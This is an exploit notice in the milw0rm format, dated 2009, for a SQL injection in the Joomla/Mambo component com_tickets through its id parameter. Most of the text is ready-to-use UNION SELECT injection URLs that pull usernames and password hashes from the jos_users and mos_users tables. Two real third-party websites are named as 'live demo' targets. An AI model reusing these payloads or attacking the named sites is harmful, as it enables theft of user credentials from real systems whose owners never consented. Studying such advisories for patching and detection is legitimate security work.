++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_tickets (id) SQL-injection Vulnerability ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt [+] Vulnerability : SQL injection ################################################### Info component: ššššššššššššššš Name : Tickets Version : 0.1 & 2.1 Author : Paul Coogan Author email : paul@ideabuzz.com Web author : http://www.ideabuzz.com ################################################### Example: http://localHost/path/index.php?option=com_tickets&task=form&id=n[SQL code] n = id valid Demo Live Joomla : version 2.1 šššššššššššššššššššššššššššššš http://www.helendaleeducationfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users/* Demo Live Mambo : Version 0.1 ššššššššššššššššššššššššššššš http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_users/* +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ # milw0rm.com [2009-06-22]